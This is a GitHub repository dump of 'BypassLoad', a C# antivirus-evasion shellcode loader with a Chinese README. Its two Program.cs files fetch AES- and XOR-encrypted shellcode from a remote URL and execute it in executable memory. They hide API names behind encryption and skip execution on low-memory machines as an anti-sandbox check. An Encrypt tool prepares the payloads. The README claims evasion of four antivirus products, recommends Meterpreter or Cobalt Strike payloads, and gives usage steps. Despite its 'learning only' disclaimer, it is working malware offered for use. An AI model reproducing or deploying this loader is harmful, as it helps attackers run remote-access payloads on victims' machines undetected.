├── BypassLoad
    ├── App.config
    ├── BypassLoad.csproj
    ├── Program.cs
    ├── Properties
    │   └── AssemblyInfo.cs
    └── README.md
├── BypassLoad2.0
    └── Program.cs
├── Encrypt
    ├── App.config
    ├── Encrypt.csproj
    ├── Program.cs
    ├── Properties
    │   └── AssemblyInfo.cs
    └── README.md
├── README.md
└── image
    ├── README.md
    ├── {4CC0F1A0-4C88-41d0-BA49-9ACAD8486F8C}.png
    ├── {AB76D9F0-6FF6-424c-BA8C-5AC09209FF61}.png
    ├── {CB42B60F-F029-46d4-ADF7-B80263FF72B8}.png
    └── {CFE2B5D0-BF30-4063-9ADC-6426314F6132}.png


/BypassLoad/App.config:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8" ?>
2 | <configuration>
3 |     <startup> 
4 |         <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2" />
5 |     </startup>
6 | </configuration>


--------------------------------------------------------------------------------
/BypassLoad/BypassLoad.csproj:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
 4 |   <PropertyGroup>
 5 |     <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
 6 |     <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
 7 |     <ProjectGuid>{6BD436FD-275A-4CF6-ABEF-8C717C120253}</ProjectGuid>
 8 |     <OutputType>WinExe</OutputType>
 9 |     <RootNamespace>BypassLoad</RootNamespace>
10 |     <AssemblyName>BypassLoad</AssemblyName>
11 |     <TargetFrameworkVersion>v4.5.2</TargetFrameworkVersion>
12 |     <FileAlignment>512</FileAlignment>
13 |     <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
14 |     <Deterministic>true</Deterministic>
15 |   </PropertyGroup>
16 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
17 |     <PlatformTarget>AnyCPU</PlatformTarget>
18 |     <DebugSymbols>true</DebugSymbols>
19 |     <DebugType>full</DebugType>
20 |     <Optimize>false</Optimize>
21 |     <OutputPath>bin\Debug\</OutputPath>
22 |     <DefineConstants>DEBUG;TRACE</DefineConstants>
23 |     <ErrorReport>prompt</ErrorReport>
24 |     <WarningLevel>4</WarningLevel>
25 |     <AllowUnsafeBlocks>true</AllowUnsafeBlocks>
26 |   </PropertyGroup>
27 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
28 |     <PlatformTarget>AnyCPU</PlatformTarget>
29 |     <DebugType>pdbonly</DebugType>
30 |     <Optimize>true</Optimize>
31 |     <OutputPath>bin\Release\</OutputPath>
32 |     <DefineConstants>TRACE</DefineConstants>
33 |     <ErrorReport>prompt</ErrorReport>
34 |     <WarningLevel>4</WarningLevel>
35 |     <AllowUnsafeBlocks>true</AllowUnsafeBlocks>
36 |   </PropertyGroup>
37 |   <PropertyGroup>
38 |     <StartupObject />
39 |   </PropertyGroup>
40 |   <ItemGroup>
41 |     <Reference Include="System" />
42 |     <Reference Include="System.Core" />
43 |     <Reference Include="System.Xml.Linq" />
44 |     <Reference Include="System.Data.DataSetExtensions" />
45 |     <Reference Include="Microsoft.CSharp" />
46 |     <Reference Include="System.Data" />
47 |     <Reference Include="System.Net.Http" />
48 |     <Reference Include="System.Xml" />
49 |   </ItemGroup>
50 |   <ItemGroup>
51 |     <Compile Include="Program.cs" />
52 |     <Compile Include="Properties\AssemblyInfo.cs" />
53 |   </ItemGroup>
54 |   <ItemGroup>
55 |     <None Include="App.config" />
56 |   </ItemGroup>
57 |   <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
58 | </Project>


--------------------------------------------------------------------------------
/BypassLoad/Program.cs:
--------------------------------------------------------------------------------
  1 | using System;
  2 | using System.Diagnostics;
  3 | using System.IO;
  4 | using System.Linq;
  5 | using System.Management;
  6 | using System.Net;
  7 | using System.Runtime.InteropServices;
  8 | using System.Security.Cryptography;
  9 | using System.Text;
 10 | 
 11 | namespace TCPMeterpreterProcess
 12 | {
 13 |     class Program
 14 |     {
 15 |         internal static class Unsafe
 16 |         {
 17 |             
 18 |             [DllImport("Kernel32")]
 19 |             internal static extern IntPtr GetProcAddress(IntPtr hModule, string procname);
 20 |             [DllImport("Kernel32")]
 21 |             internal static extern IntPtr LoadLibrary(string moduleName);
 22 |         }
 23 |         internal delegate bool Write_Process_Memory(
 24 |             IntPtr hProcess,
 25 |             IntPtr lpBaseAddress,
 26 |             byte[] lpBuffer,
 27 |             uint nSize,
 28 |             out UIntPtr lpNumberOfBytesWritten);
 29 |         internal delegate bool Virtual_Free(
 30 |             IntPtr lpAddress,
 31 |             uint dwSize,
 32 |             uint dwFreeType);
 33 |         internal delegate UInt32 Virtual_Alloc(
 34 |             UInt32 lpStartAddr,
 35 |             UInt32 size,
 36 |             UInt32 flAllocationType,
 37 |             UInt32 flProtect);
 38 |         internal delegate IntPtr Create_Thread(
 39 |             UInt32 lpThreadAttributes,
 40 |             UInt32 dwStackSize,
 41 |             UInt32 lpStartAddress,
 42 |             IntPtr param,
 43 |             UInt32 dwCreationFlags,
 44 |             ref UInt32 lpThreadId);
 45 |         internal delegate UInt32 Wait_ForSingle_Object(
 46 |             IntPtr hHandle,
 47 |             UInt32 dwMilliseconds
 48 |         );
 49 |         static string key = "BsijVUv2v+Ql/NM3pQv8uQ==";
 50 |         static string k = "AyD9Y9zW9dtvfqJzJb33gA==";
 51 |         static string v = "YlnmzpP5550nqLxW+3wdNQ==";
 52 |         static string c = "AkJecKOgemBiLxROAtA9WA==";
 53 |         static string w = "cH9ouyrpylq2wwZqDlf5Uod4zw5Vx+OrGTO0iMg4ah8=";
 54 |         static void Main(string[] args)
 55 |         {
 56 |             run_1();
 57 |             //run_2();
 58 |         }
 59 |         private static void run_1()
 60 |         {
 61 |             
 62 |             ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls | SecurityProtocolType.Tls11 | SecurityProtocolType.Tls12 | SecurityProtocolType.Ssl3;
 63 |             ManagementObjectSearcher searcher = new ManagementObjectSearcher("SELECT TotalPhysicalMemory FROM Win32_ComputerSystem");
 64 |             double totalMemoryMb = 0;
 65 |             foreach (ManagementObject obj in searcher.Get())
 66 |             {
 67 |                 ulong totalMemoryBytes = (ulong)obj["TotalPhysicalMemory"];
 68 |                 totalMemoryMb = (totalMemoryBytes / 1024f) / 1024f;
 69 |             }
 70 |             if (totalMemoryMb >= 3999)
 71 |             {
 72 |                 byte[] shellcode = GetShellCode();
 73 |                 IntPtr K_handler = Unsafe.LoadLibrary(AesDecrypt(k, key));
 74 |                 IntPtr trva = Unsafe.GetProcAddress(K_handler, AesDecrypt(v, key));
 75 | 
 76 |                 unhook(K_handler, trva);
 77 | 
 78 |                 Virtual_Alloc va = (Virtual_Alloc)Marshal.GetDelegateForFunctionPointer(trva, typeof(Virtual_Alloc));
 79 |                 IntPtr trct = Unsafe.GetProcAddress(K_handler, AesDecrypt(c, key));
 80 |                 IntPtr trwf = Unsafe.GetProcAddress(K_handler, AesDecrypt(w, key));
 81 | 
 82 |                 unhook(K_handler, trct);
 83 |                 unhook(K_handler, trwf);
 84 | 
 85 |                 Create_Thread ct = (Create_Thread)Marshal.GetDelegateForFunctionPointer(trct, typeof(Create_Thread));
 86 |                 Wait_ForSingle_Object wfoi = (Wait_ForSingle_Object)Marshal.GetDelegateForFunctionPointer(trwf, typeof(Wait_ForSingle_Object));
 87 |                 
 88 |                 UInt32 mem = va(0, (UInt32)shellcode.Length, 0x1000, 0x40);
 89 |                 Marshal.Copy(shellcode, 0, (IntPtr)(mem), shellcode.Length);
 90 |                 UInt32 threadId = 0;
 91 |                 IntPtr hThread = ct(0, 0, mem, IntPtr.Zero, 0, ref threadId);
 92 |                 wfoi(hThread, 0xFFFFFFFF);
 93 |             }
 94 |         }
 95 |         
 96 |         private static void unhook(IntPtr K_handler,IntPtr inptrfa)
 97 |         {
 98 |             byte[] assemblyBytes = { };
 99 |             int size = sizeof(int);
100 |             byte[] read = new byte[size];
101 |             Marshal.Copy(inptrfa, read, 0, size);
102 |             UIntPtr bytesWritten = UIntPtr.Zero;
103 | 
104 |             string Aes_vf = "oWoor6Bfv1W3yL4QM0gHMw==";
105 | 
106 |             IntPtr newMemory = Marshal.AllocHGlobal(read.Length);
107 |             Marshal.Copy(read, 0, newMemory, read.Length);
108 |             IntPtr vf_add = Unsafe.GetProcAddress(K_handler, AesDecrypt(Aes_vf, key));
109 |             Virtual_Free vf = (Virtual_Free)Marshal.GetDelegateForFunctionPointer(vf_add, typeof(Virtual_Free));
110 | 
111 |             vf(inptrfa, 0, 0);
112 |         }
113 |         private static char[] Xor_Decrypt(char[] data)
114 |         {
115 |             char[] key = "qwertyuiopasdfghjklzxcvbnm".ToArray();
116 |             for (int i = 0; i < data.Length; i++)
117 |             {
118 |                 data[i] ^= key[i % key.Length];
119 |             }
120 |             return data;
121 |         }
122 | 
123 |         private static string AesDecrypt(string str, string key)
124 |         {
125 |             if (string.IsNullOrEmpty(str)) return null;
126 |             Byte[] toEncryptArray = Convert.FromBase64String(str);
127 |             RijndaelManaged rm = new RijndaelManaged
128 |             {
129 |                 Key = Encoding.UTF8.GetBytes(key),
130 |                 Mode = CipherMode.ECB,
131 |                 Padding = PaddingMode.PKCS7
132 |             };
133 |             ICryptoTransform cTransform = rm.CreateDecryptor();
134 |             Byte[] resultArray = cTransform.TransformFinalBlock(toEncryptArray, 0, toEncryptArray.Length);
135 |             return Encoding.UTF8.GetString(resultArray);
136 |         }
137 |         private static byte[] GetShellCode()
138 |         {
139 |             string UserAgent = "/UiTAqd4SYU/cWqwQjNlt/0Slgaba9XvrXGtF4BGV+oI4+geZLyDFVmIWr236HHhnYtLHafUsVMkQbLhcdNw1XPhonbGx5BsjD4fMbiFDLc=";
140 |             string path = System.AppDomain.CurrentDomain.SetupInformation.ApplicationBase + "webpath.txt";
141 |             string webpath = File.ReadAllText(path, Encoding.UTF8);
142 |             HttpWebRequest req = (HttpWebRequest)WebRequest.Create(new Uri(webpath));
143 |             req.Method = "GET";
144 |             req.UserAgent = AesDecrypt(UserAgent, "BsijVUv2v+Ql/NM3pQv8uQ==");
145 |             HttpWebResponse res = (HttpWebResponse)req.GetResponse();
146 |             Stream stms = res.GetResponseStream();
147 |             StreamReader reader = new StreamReader(stms, Encoding.UTF8);
148 |             string result = reader.ReadToEnd();
149 |             reader.Close();
150 |             req.Abort();
151 |             result = AesDecrypt(result, "BsijVUv2v+Ql/NM3pQv8uQ==");
152 |             char[] c_result = result.ToCharArray();
153 |             result = new string(Xor_Decrypt(c_result));
154 |             byte[] shellcode = HexStringToBytes(result);
155 |             return shellcode;
156 |         }
157 |         public static byte[] HexStringToBytes(string hexString)
158 |         {
159 |             hexString = hexString.Replace(" ", "").Replace("0x", "").Replace("0X", "").Replace("-", "").Replace(":", "").Replace(",", "").Replace(@"\x","").Replace(@"\X", "");
160 |             if (hexString.Length % 2 != 0)
161 |                 throw new ArgumentException();
162 |             return Enumerable.Range(0, hexString.Length / 2)
163 |                     .Select(i => Convert.ToByte(hexString.Substring(i * 2, 2), 16))
164 |                     .ToArray();
165 |         }
166 |     }
167 | }
168 | 


--------------------------------------------------------------------------------
/BypassLoad/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
 1 | using System.Reflection;
 2 | using System.Runtime.CompilerServices;
 3 | using System.Runtime.InteropServices;
 4 | 
 5 | // 有关程序集的一般信息由以下
 6 | // 控制。更改这些特性值可修改
 7 | // 与程序集关联的信息。
 8 | [assembly: AssemblyTitle("BypassLoad")]
 9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("BypassLoad")]
13 | [assembly: AssemblyCopyright("Copyright ©  2024")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 | 
17 | // 将 ComVisible 设置为 false 会使此程序集中的类型
18 | //对 COM 组件不可见。如果需要从 COM 访问此程序集中的类型
19 | //请将此类型的 ComVisible 特性设置为 true。
20 | [assembly: ComVisible(false)]
21 | 
22 | // 如果此项目向 COM 公开，则下列 GUID 用于类型库的 ID
23 | [assembly: Guid("6bd436fd-275a-4cf6-abef-8c717c120253")]
24 | 
25 | // 程序集的版本信息由下列四个值组成: 
26 | //
27 | //      主版本
28 | //      次版本
29 | //      生成号
30 | //      修订号
31 | //
32 | //可以指定所有这些值，也可以使用“生成号”和“修订号”的默认值
33 | //通过使用 "*"，如下所示:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 | 


--------------------------------------------------------------------------------
/BypassLoad/README.md:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/BypassLoad2.0/Program.cs:
--------------------------------------------------------------------------------
  1 | using System;
  2 | using System.IO;
  3 | using System.Linq;
  4 | using System.Management;
  5 | using System.Net;
  6 | using System.Reflection;
  7 | using System.Runtime.InteropServices;
  8 | using System.Security.Cryptography;
  9 | using System.Text;
 10 | 
 11 | namespace TCPMeterpreterProcess
 12 | {
 13 |     class Program
 14 |     {
 15 |         internal static class Unsafe
 16 |         {
 17 | 
 18 |             [DllImport("Kernel32")]
 19 |             internal static extern IntPtr GetProcAddress(IntPtr hModule, string procname);
 20 |             [DllImport("Kernel32")]
 21 |             internal static extern IntPtr LoadLibrary(string moduleName);
 22 |         }
 23 |         internal delegate bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
 24 |         static void Main(string[] args)
 25 |         {
 26 |             run_2();
 27 |         }
 28 |         private static void run_2()
 29 |         {
 30 |             ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls | SecurityProtocolType.Tls11 | SecurityProtocolType.Tls12 | SecurityProtocolType.Ssl3;
 31 |             ManagementObjectSearcher searcher = new ManagementObjectSearcher("SELECT TotalPhysicalMemory FROM Win32_ComputerSystem");
 32 |             double totalMemoryMb = 0;
 33 |             string k = "AyD9Y9zW9dtvfqJzJb33gA==";
 34 |             string key = "BsijVUv2v+Ql/NM3pQv8uQ==";
 35 |             IntPtr K_handler = Unsafe.LoadLibrary(AesDecrypt(k, key));
 36 |             IntPtr trvp = Unsafe.GetProcAddress(K_handler, AesDecrypt("3T4eooJx0SrVxuzFC9jxuA==", key));
 37 |             foreach (ManagementObject obj in searcher.Get())
 38 |             {
 39 |                 ulong totalMemoryBytes = (ulong)obj["TotalPhysicalMemory"];
 40 |                 totalMemoryMb = (totalMemoryBytes / 1024f) / 1024f;
 41 |             }
 42 |             if (totalMemoryMb >= 3999)
 43 |             {
 44 |                 byte[] shellcode = GetShellCode();
 45 |                 UInt32 PAGE_EXECUTE_READWRITE = 0x40;
 46 |                 UInt32 oldProtect;
 47 |                 IntPtr mem = Marshal.AllocHGlobal(shellcode.Length);
 48 |                 Marshal.Copy(shellcode, 0, mem, shellcode.Length);
 49 |                 VirtualProtect vp = (VirtualProtect)Marshal.GetDelegateForFunctionPointer(trvp, typeof(VirtualProtect));
 50 |                 
 51 |                 vp(mem, (UIntPtr)shellcode.Length, PAGE_EXECUTE_READWRITE, out oldProtect);
 52 |                 var shellcodeDelegate = (Action)Marshal.GetDelegateForFunctionPointer(mem, typeof(Action));
 53 |                 shellcodeDelegate();
 54 |             }
 55 |         }
 56 |         private static byte[] GetShellCode()
 57 |         {
 58 |             string path = System.AppDomain.CurrentDomain.SetupInformation.ApplicationBase + "webpath.txt";
 59 |             string webpath = File.ReadAllText(path, Encoding.UTF8);
 60 |             WebRequest request = WebRequest.Create(webpath);
 61 |             WebResponse response = request.GetResponse();
 62 |             Stream s = response.GetResponseStream();
 63 |             StreamReader sr = new StreamReader(s, Encoding.GetEncoding("UTF-8"));
 64 |             string result = sr.ReadToEnd();
 65 |             result = AesDecrypt(result, "BsijVUv2v+Ql/NM3pQv8uQ==");
 66 |             char[] c_result = result.ToCharArray();
 67 |             result = new string(Xor_Decrypt(c_result));
 68 |             byte[] shellcode = HexStringToBytes(result);
 69 |             return shellcode;
 70 |         }
 71 |         private static char[] Xor_Decrypt(char[] data)
 72 |         {
 73 |             char[] key = "qwertyuiopasdfghjklzxcvbnm".ToArray();
 74 |             char[] encryptedData = new char[data.Length];
 75 |             for(int i = 0; i < data.Length; i++)
 76 |             {
 77 |                 encryptedData[i] = (char)(data[i] ^ key[i % key.Length]); 
 78 |             }
 79 |             return encryptedData;
 80 |         }
 81 |         private static string AesDecrypt(string str, string key)
 82 |         {
 83 |             if (string.IsNullOrEmpty(str)) return null;
 84 |             Byte[] toEncryptArray = Convert.FromBase64String(str);
 85 |             RijndaelManaged rm = new RijndaelManaged
 86 |             {
 87 |                 Key = Encoding.UTF8.GetBytes(key),
 88 |                 Mode = CipherMode.ECB,
 89 |                 Padding = PaddingMode.PKCS7
 90 |             };
 91 |             ICryptoTransform cTransform = rm.CreateDecryptor();
 92 |             Byte[] resultArray = cTransform.TransformFinalBlock(toEncryptArray, 0, toEncryptArray.Length);
 93 |             return Encoding.UTF8.GetString(resultArray);
 94 |         }
 95 |         public static byte[] HexStringToBytes(string hexString)
 96 |         {
 97 |             hexString = hexString.Replace(" ", "").Replace("0x", "").Replace("0X", "").Replace("-", "").Replace(":", "").Replace(",", "").Replace("\\x","").Replace("\\X","");
 98 |             if (hexString.Length % 2 != 0)
 99 |                 throw new ArgumentException();
100 |             return Enumerable.Range(0, hexString.Length / 2)
101 |                     .Select(i => Convert.ToByte(hexString.Substring(i * 2, 2), 16))
102 |                     .ToArray();
103 |         }
104 |     }
105 | }


--------------------------------------------------------------------------------
/Encrypt/App.config:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8" ?>
2 | <configuration>
3 |     <startup> 
4 |         <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2" />
5 |     </startup>
6 | </configuration>


--------------------------------------------------------------------------------
/Encrypt/Encrypt.csproj:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
 4 |   <PropertyGroup>
 5 |     <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
 6 |     <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
 7 |     <ProjectGuid>{C6CD5D62-40C7-4241-A3FD-F487C0150A90}</ProjectGuid>
 8 |     <OutputType>Exe</OutputType>
 9 |     <RootNamespace>Decrypt</RootNamespace>
10 |     <AssemblyName>Decrypt</AssemblyName>
11 |     <TargetFrameworkVersion>v4.5.2</TargetFrameworkVersion>
12 |     <FileAlignment>512</FileAlignment>
13 |     <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
14 |     <Deterministic>true</Deterministic>
15 |   </PropertyGroup>
16 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
17 |     <PlatformTarget>AnyCPU</PlatformTarget>
18 |     <DebugSymbols>true</DebugSymbols>
19 |     <DebugType>full</DebugType>
20 |     <Optimize>false</Optimize>
21 |     <OutputPath>bin\Debug\</OutputPath>
22 |     <DefineConstants>DEBUG;TRACE</DefineConstants>
23 |     <ErrorReport>prompt</ErrorReport>
24 |     <WarningLevel>4</WarningLevel>
25 |   </PropertyGroup>
26 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
27 |     <PlatformTarget>AnyCPU</PlatformTarget>
28 |     <DebugType>pdbonly</DebugType>
29 |     <Optimize>true</Optimize>
30 |     <OutputPath>bin\Release\</OutputPath>
31 |     <DefineConstants>TRACE</DefineConstants>
32 |     <ErrorReport>prompt</ErrorReport>
33 |     <WarningLevel>4</WarningLevel>
34 |   </PropertyGroup>
35 |   <ItemGroup>
36 |     <Reference Include="System" />
37 |     <Reference Include="System.Core" />
38 |     <Reference Include="System.Xml.Linq" />
39 |     <Reference Include="System.Data.DataSetExtensions" />
40 |     <Reference Include="Microsoft.CSharp" />
41 |     <Reference Include="System.Data" />
42 |     <Reference Include="System.Net.Http" />
43 |     <Reference Include="System.Xml" />
44 |   </ItemGroup>
45 |   <ItemGroup>
46 |     <Compile Include="Program.cs" />
47 |     <Compile Include="Properties\AssemblyInfo.cs" />
48 |   </ItemGroup>
49 |   <ItemGroup>
50 |     <None Include="App.config" />
51 |   </ItemGroup>
52 |   <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
53 | </Project>


--------------------------------------------------------------------------------
/Encrypt/Program.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Collections.Generic;
 3 | using System.IO;
 4 | using System.Linq;
 5 | using System.Security.Cryptography;
 6 | using System.Text;
 7 | using System.Threading.Tasks;
 8 | 
 9 | namespace Encrypt
10 | {
11 |     class Program
12 |     {
13 |         static void Main(string[] args)
14 |         {
15 |             string path = System.AppDomain.CurrentDomain.SetupInformation.ApplicationBase;
16 |             string shellcode = File.ReadAllText(path + "shellcode.txt", Encoding.UTF8);
17 |             shellcode = new string(xor(shellcode));
18 |             string D_shellcode = AesEncrypt(shellcode, "BsijVUv2v+Ql/NM3pQv8uQ==");
19 |             /*using (Aes aes = Aes.Create())
20 |             {
21 |                 aes.KeySize = 128;
22 |                 aes.GenerateKey();
23 |                 Console.WriteLine(Convert.ToBase64String(aes.Key));
24 |             }*/
25 |             Console.WriteLine(D_shellcode);
26 |             Console.ReadLine();
27 |         }
28 |         private static char[] xor(string str)
29 |         {
30 |             char[] data = str.ToArray();
31 |             char[] key = "qwertyuiopasdfghjklzxcvbnm".ToArray();
32 |             for (int i = 0; i < data.Length; i++)
33 |             {
34 |                 data[i] ^= key[i % key.Length];
35 |             }
36 | 
37 |             return data;
38 |         }
39 |         private static string AesEncrypt(string str, string key)
40 |         {
41 |             if (string.IsNullOrEmpty(str)) return null;
42 |             Byte[] toEncryptArray = Encoding.UTF8.GetBytes(str);
43 | 
44 |             RijndaelManaged rm = new RijndaelManaged
45 |             {
46 |                 Key = Encoding.UTF8.GetBytes(key),
47 |                 Mode = CipherMode.ECB,
48 |                 Padding = PaddingMode.PKCS7
49 |             };
50 | 
51 |             ICryptoTransform cTransform = rm.CreateEncryptor();
52 |             Byte[] resultArray = cTransform.TransformFinalBlock(toEncryptArray, 0, toEncryptArray.Length);
53 |             return Convert.ToBase64String(resultArray);
54 |         }
55 |     }
56 | }
57 | 


--------------------------------------------------------------------------------
/Encrypt/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
 1 | using System.Reflection;
 2 | using System.Runtime.CompilerServices;
 3 | using System.Runtime.InteropServices;
 4 | 
 5 | // 有关程序集的一般信息由以下
 6 | // 控制。更改这些特性值可修改
 7 | // 与程序集关联的信息。
 8 | [assembly: AssemblyTitle("Decrypt")]
 9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("Decrypt")]
13 | [assembly: AssemblyCopyright("Copyright ©  2024")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 | 
17 | // 将 ComVisible 设置为 false 会使此程序集中的类型
18 | //对 COM 组件不可见。如果需要从 COM 访问此程序集中的类型
19 | //请将此类型的 ComVisible 特性设置为 true。
20 | [assembly: ComVisible(false)]
21 | 
22 | // 如果此项目向 COM 公开，则下列 GUID 用于类型库的 ID
23 | [assembly: Guid("c6cd5d62-40c7-4241-a3fd-f487c0150a90")]
24 | 
25 | // 程序集的版本信息由下列四个值组成: 
26 | //
27 | //      主版本
28 | //      次版本
29 | //      生成号
30 | //      修订号
31 | //
32 | //可以指定所有这些值，也可以使用“生成号”和“修订号”的默认值
33 | //通过使用 "*"，如下所示:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 | 


--------------------------------------------------------------------------------
/Encrypt/README.md:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # BypassLoad
 2 | **通过远程加载AES + XOR异或加密shellcode的免杀加载器，无过多技术细节。**
 3 | 
 4 | | shellcode | 360杀毒    | 火绒 | Defender | 腾讯电脑管家 | VT |
 5 | | --------- | -----------| --- | -------  | ------------- |  --  |
 6 | | Meterpreter  | √       |   √ |    √      | √           |  13/69  |
 7 | | Cobalt Strike| √   |   √ |    √      | √           |   13/69 |
 8 | 
 9 | 推荐Meterpreter生成shellcode，Cobalt Strike在尝试远程加载的shellcode时可能被360拦截
10 | 
11 | 可自行`加壳`或`修改`程序尝试
12 | 
13 | **releases程序可能会被杀软hash标记，保证免杀效果请自行编译**
14 | 
15 | **如果你不知道怎么做，不推荐使用该程序**
16 | 
17 | ## 声明：
18 | 1. 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途以及盈利等目的，否则后果自行承担！
19 | 2. 水平不高，纯萌新刚刚开始研究免杀，面向Github编程借鉴了很多大佬的代码。
20 | 3. 目前测试通过360、火绒、腾讯电脑管家、Defender。其他自行测试
21 | 
22 | ## 使用指南
23 | 
24 | 1. 编译BypassLoad和Encrypt
25 | 2. 将shellcode写入shellcode.txt然后运行Encrypt.exe进行加密编码（注意需要手动去除换行）
26 | 3. 将Encrypt.exe加密编码后的数据上传至服务器
27 | 4. 将远程访问链接写入webpath.txt
28 | 5. 运行BypassLoad.exe
29 | 
30 | 注意：存在一段if判断内存是否小于4G，进行简单的反沙箱判断。
31 | 
32 | ## 更新
33 | 2024年03月11日
34 |   1. 更新2.0 使用.Net内置函数替换原有使用的Windows函数
35 |   
36 | 2024年01月29日
37 |   1. 效果优化，更换加载方式
38 |   2. 不再提供releases，请自行编译
39 | 
40 | 2024年01月26日
41 |   1. 效果优化
42 |   2. 请不要将程序放入沙箱，以延长免杀时间
43 | 
44 | 2024年01月24日
45 |   1. 效果优化，现已免杀Defender
46 |   2. 现在基于.NET Framework4.7.2框架
47 |   3. 移除了一段无效代码
48 | 
49 | <p align="center"">
50 |   <img src="https://github.com/Mangofang/BypassLoad/blob/main/image/%7BCFE2B5D0-BF30-4063-9ADC-6426314F6132%7D.png">
51 | </p>
52 | 
53 | <p align="center">
54 |   <img src="https://github.com/Mangofang/BypassLoad/blob/main/image/%7BAB76D9F0-6FF6-424c-BA8C-5AC09209FF61%7D.png">
55 | </p>
56 | 


--------------------------------------------------------------------------------
/image/README.md:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/image/{4CC0F1A0-4C88-41d0-BA49-9ACAD8486F8C}.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Mangofang/BypassLoad/5a23d895b651088ce846df0aabe72acffe6553ab/image/{4CC0F1A0-4C88-41d0-BA49-9ACAD8486F8C}.png


--------------------------------------------------------------------------------
/image/{AB76D9F0-6FF6-424c-BA8C-5AC09209FF61}.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Mangofang/BypassLoad/5a23d895b651088ce846df0aabe72acffe6553ab/image/{AB76D9F0-6FF6-424c-BA8C-5AC09209FF61}.png


--------------------------------------------------------------------------------
/image/{CB42B60F-F029-46d4-ADF7-B80263FF72B8}.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Mangofang/BypassLoad/5a23d895b651088ce846df0aabe72acffe6553ab/image/{CB42B60F-F029-46d4-ADF7-B80263FF72B8}.png


--------------------------------------------------------------------------------
/image/{CFE2B5D0-BF30-4063-9ADC-6426314F6132}.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Mangofang/BypassLoad/5a23d895b651088ce846df0aabe72acffe6553ab/image/{CFE2B5D0-BF30-4063-9ADC-6426314F6132}.png


--------------------------------------------------------------------------------